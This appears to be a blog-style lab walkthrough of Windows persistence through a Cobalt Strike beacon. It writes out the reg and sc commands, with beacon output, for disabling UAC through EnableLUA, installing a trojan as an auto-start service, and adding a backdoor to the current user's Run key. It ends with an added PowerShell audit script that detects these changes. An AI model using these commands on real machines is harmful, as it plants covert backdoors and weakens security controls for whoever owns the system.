Thoughts on persistence through registry backdoors

Environment

Windows 10 virtual machine

Cobalt Strike [the client runs on the Windows 10 host used here; the team server is on a cloud host]

The Windows 10 virtual machine is already under remote control through a Cobalt Strike beacon

Open the beacon console in Cobalt Strike

For comparison [keeping an executable resident as a persistent backdoor through a service]

Set HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA to 0
With this value at 0, UAC is disabled and any process started by an administrator account runs with the full administrator token, with no consent prompt. Two caveats: writing to this HKLM key already requires administrative rights, and the change only takes effect after a reboot. It is also a system-wide, easily audited change, so it is noisy.

Query the current value

shell reg query "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System"

EnableLUA is set to 1

EnableLUA is set to 0

beacon> shell sc create "test" binpath= "C:\Users\calmness\Desktop\ceshi.exe"  [fill in the path of your own Trojan]
[*] Tasked beacon to run: sc create "test" binpath= "C:\Users\calmness\Desktop\ceshi.exe"
[+] host called home, sent: 94 bytes
[+] received output:
[SC] CreateService SUCCESS
beacon> shell sc description "test"        [set the service description]
[*] Tasked beacon to run: sc description "test" 
[+] host called home, sent: 59 bytes
[+] received output:
[SC] ChangeServiceConfig2 SUCCESS
beacon> shell sc config "test" start= auto   [set the service to start automatically]
[*] Tasked beacon to run: sc config "test" start= auto
[+] host called home, sent: 59 bytes
[+] received output:
[SC] ChangeServiceConfig SUCCESS
beacon> shell net start "test"        [start the service]
[*] Tasked beacon to run: net start "test"
[+] host called home, sent: 47 bytes
[+] received output:

Note that sc create and sc config need administrative rights on the Service Control Manager, and that the SCM expects a real service binary: a plain executable that never registers a service control handler is killed once the start timeout expires (error 1053, "the service did not respond in a timely fashion"), although it usually has enough time to call home first. A payload built as a service executable avoids that problem.


Writing the backdoor straight into the registry as an autostart entry

Next, add a generated backdoor to the current user's Run key. This key is writable without administrative rights, and the entry runs every time that user logs on:

shell reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "calm" /t REG_SZ /d "C:\Users\calmness\calmnexx.exe" /f


After the next logon the beacon is still online
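The defender's side of the two techniques above, as an added example that is not part of the original post: a PowerShell audit that checks the EnableLUA value, lists every value under the user and machine Run/RunOnce keys, and lists auto-start services whose binary lives outside the Windows or Program Files directories. The "Suspicious" heuristics (paths under Users, Temp or AppData; service binaries outside the system directories) are assumptions chosen for illustration, not a complete detection rule. Run it in an elevated Windows PowerShell 5.1 (or later) prompt so HKLM and every service are readable.

```powershell
# Added example (not from the original post): audit the persistence points
# discussed above on the local host. Run elevated.

$RunKeys = @(
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce'
)
# Properties the registry provider attaches to every item; they are not real values.
$ProviderProps = 'PSPath', 'PSParentPath', 'PSChildName', 'PSDrive', 'PSProvider'
# Assumed heuristic: autostart commands living in a user profile or temp dir deserve a look.
$UserPathPattern = '\\Users\\|\\Temp\\|\\AppData\\'

function Get-EnableLuaState {
    $key = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
    $value = (Get-ItemProperty -Path $key -Name EnableLUA -ErrorAction SilentlyContinue).EnableLUA
    [pscustomobject]@{
        Check      = 'EnableLUA'
        Value      = $value
        # 0 means UAC is off: every process an admin starts gets the full token.
        Suspicious = ($value -eq 0)
    }
}

function Get-RunKeyEntries {
    foreach ($key in $RunKeys) {
        if (-not (Test-Path $key)) { continue }
        $item = Get-ItemProperty -Path $key
        foreach ($prop in $item.PSObject.Properties) {
            if ($ProviderProps -contains $prop.Name) { continue }
            [pscustomobject]@{
                Key        = $key
                Name       = $prop.Name
                Command    = [string]$prop.Value
                Suspicious = ([string]$prop.Value -match $UserPathPattern)
            }
        }
    }
}

function Get-AutoStartServices {
    Get-CimInstance -ClassName Win32_Service |
        Where-Object { $_.StartMode -eq 'Auto' } |
        ForEach-Object {
            [pscustomobject]@{
                Name       = $_.Name
                PathName   = $_.PathName
                State      = $_.State
                # Assumed heuristic: flag binaries outside Windows\ and Program Files\ for review.
                Suspicious = ($_.PathName -notmatch '^"?[A-Za-z]:\\(Windows|Program Files)')
            }
        }
}

Get-EnableLuaState | Format-List
Get-RunKeyEntries | Format-Table -AutoSize
Get-AutoStartServices | Where-Object { $_.Suspicious } | Format-Table -AutoSize
```

On the machine from this walkthrough the script would report EnableLUA as 0, the "calm" value under the HKCU Run key pointing into C:\Users\calmness, and the "test" service whose binary sits on the Desktop, all three marked Suspicious. The Run key check compares against the same keys the reg add command writes to, so it catches the user-level entry without needing administrative rights; the service and EnableLUA checks are the reason to run it elevated.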

One more note:

beacon> shell cmd /k dir

[*] Tasked beacon to run: cmd /k dir

[+] host called home, sent: 41 bytes

[+] received output:

 Volume in drive C has no label.

 Volume Serial Number is 88B7-95BE

 Directory of C:\Users\calmness\Desktop

2020/09/21  13:07    <DIR>          .

End!


